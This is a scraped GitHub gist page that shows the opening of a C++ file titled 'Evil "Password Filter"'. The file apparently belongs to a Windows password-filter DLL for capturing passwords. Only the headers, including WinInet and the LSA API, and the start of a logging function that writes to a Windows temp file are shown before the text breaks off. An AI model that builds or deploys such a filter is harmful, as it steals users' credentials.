Skip to content

Instantly share code, notes, and snippets.

View HybridProgrammer's full-sized avatar

Jason Heithoff HybridProgrammer

  • FAU - College of Engineering and Computer Science
  • Florida
View GitHub Profile
@mubix
mubix / evilpassfilter.cpp
Created September 10, 2013 19:24
Evil "Password Filter"
#include <windows.h>
#include <stdio.h>
#include <WinInet.h>
#include <ntsecapi.h>
void writeToLog(const char* szString)
{
FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+");
if (NULL == pFile)
{